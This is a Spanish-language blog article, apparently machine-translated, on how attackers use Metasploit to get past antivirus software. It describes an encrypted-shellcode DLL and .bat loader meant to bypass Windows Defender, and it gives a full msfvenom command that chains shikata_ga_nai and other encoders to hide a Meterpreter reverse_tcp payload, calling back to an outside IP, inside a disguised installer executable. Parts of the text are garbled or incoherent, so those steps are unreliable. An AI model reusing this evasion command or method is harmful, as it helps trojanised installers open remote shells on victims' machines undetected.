Cómo los hackers derrotan al software antivirus usando Metasploit
Metasploit es el marco más popular para pruebas de penetración. Además de las pruebas de vulnerabilidad, podemos utilizar Metasploit para mejorar nuestra conciencia de seguridad, gestionar activos y adelantarnos a las amenazas cibernéticas. Aprender cómo los piratas informáticos derrotan el software antivirus utilizando Metasploit abre muchas puertas. Pero la prueba de seguridad ofensiva necesita conocer el tipo de módulo de evasión. Brinda una mejor experiencia contra objetivos que ejecutan software antivirus.
El marco de Metasploit es amplio y tiene muchas herramientas. La aplicación independiente de Rapid7 se puede utilizar fácilmente en un entorno Kali Linux. Ya que permite que Metasploit se ejecute de forma plug-and-play, en el entorno sandbox de Kali Linux.
Configurando un ambiente
Los piratas informáticos prueban los comandos de sus terminales en VMware o máquinas virtuales porque les permiten utilizar múltiples sistemas operativos con las mismas unidades de software. Además, facilita el proceso de prueba. En general, se requieren sistemas operativos como Windows, el sistema Kali Linux y Metasploit para derrotar al software antivirus. Porque antes de implementarse en el mundo real, el programa debe pasar procesos antivirus. De lo contrario, los expedientes y el procedimiento no servirán de nada.
Ejecutando Metasploit en Kali Linux
Suponiendo que Kali Linux ya esté instalado dentro de VirtualBox o VMWare Workstation. En la terminal, escriba el comando metsaploit «msfconsole» y presione enter. Para obtener una lista completa de comandos de metasploit, consulte la lista aquí en HackingLoops. Iniciará el marco integrado de Metasploit sin problemas adicionales. Si no está seguro y es necesaria una verificación de actualización, simplemente escriba «sudo apt update/sudo apt install metasploit-framework».
Una vez actualizado, necesitamos compilar una DLL para su ejecución. La DLL incluye shellcode cifrado y un archivo .bat personalizado. Por supuesto, necesitamos crear uno manualmente según nuestros requisitos. El último paso es ejecutarlo.
Incluso si el defensor de Windows está activado en la configuración de Windows, la vulnerabilidad aún puede atenuarse. Dentro de la terminal, podemos crear nuestra carga útil como «PayLoad/ MT/ EHa stager.cpp aes.cpp». Y luego, «loader_bat_creator.rb».
Ahora creará el archivo .bat de acuerdo con el valor predeterminado de Metasploit 5 para anular el defensor de Windows. Escanear stager.dll y loader.bat con un programa antivirus (3tercero parte) no nos da ningún error. Con las pruebas en su máquina virtual, se puede implementar en el mundo real como sesiones. Podemos usar PowerShell, JavaScript o C# para crear los módulos.
Lo que hacen los hackers es adjuntar un archivo ejecutable (.exe) con un pdf u otro descargable de fuentes maliciosas. Una vez que el ejecutable se ejecuta con la ayuda del programa principal, envía un shell al atacante. Microsoft Windows tiene una interfaz de escaneo antimalware (AMSI). Ayuda al motor de Windows Defender a buscar entradas maliciosas. Hacen que sea difícil derrotar al software antivirus, pero sigue siendo un programa que puede explotarse a través de puertas traseras.
Otra cosa a tener en cuenta es el Cliente ML. Un cliente de ML es algo con lo que los usuarios interactúan. Son módulos de aprendizaje automático propios de los sistemas operativos, que ayudan a los defensores locales o al software antivirus. De forma rutinaria se recopilan firmas tradicionales, malware y comportamientos genéricos y se envían datos para su posterior inspección.
Los atacantes modifican Powershell todo el tiempo para eliminar el software antivirus. Dado que no estamos tocando el disco directamente, algunos comandos en Powershell pueden evitar un ejecutable malicioso de un atacante.
powershell.exe -comando “Salida de escritura [Convert]::FromBase64String(‘SGVsbG8gV29ybGQh’)”
Un atacante abusa mucho de Powershell. En el fondo, si el usuario permite la aplicación, evita más correcciones. Si los atacantes pasan «Base64» o campos similares, deben finalizar inmediatamente incluso si Powershell habilitó su ejecución.
Codificador MSF
Siempre hay una función predeterminada para los codificadores. Esto es predeterminado y universal por una razón. Los atacantes lo modifican a su propia voluntad y lo despliegan como mejor les parezca. Por lo tanto, el patrón de carga útil predeterminado de msfvenom se vuelve absoluto. En este caso, Shikata_ga_nai, se utiliza una versión actualizada de msf dentro del codificador. Se trata de una técnica de codificación polimórfica según especialistas en la materia. Una aportación práctica puede ser
msfvenom -a x64 –plataforma windows -p windows/meterpreter/reverse_tcp -e x64/shikata_ga_nai -i 20 LHOST=101.208.1.8 LPORT=8080 -f raw | msfvenom -a x64 –plataforma windows -e x64/alpha_upper -i 10 -f raw | msfvenom -a x64 –plataforma windows -e x64/countdown -i 10 -x (nombre del programa antivirus “X”) zip_setup_4.0.0.1030.exe -f exe > 360zip_setup.20155110.exe
Los atacantes intentan varias veces de diversas formas utilizar cifrados adecuados para atraer a las víctimas. Y un pequeño porcentaje es víctima. Una gran plataforma es VirusTotal, donde los atacantes cargan archivos con variantes de antivirus. Proporciona una estimación aproximada del tiempo que se implementará con la codificación actual o se necesitarán más actualizaciones para aprobar. Muchos atacantes utilizan secuencias de comandos Python automatizadas para enviar spam a través de filtros que intentan enviar archivos a la máquina de la víctima. La práctica es bastante compleja y las constantes actualizaciones mantienen alejados a los piratas informáticos la mayor parte del tiempo.
Related Posts
Presentar Presentaciones de Google NO en pantalla completa
Cómo enviar dinero de T-Kash a M-Pesa fácilmente
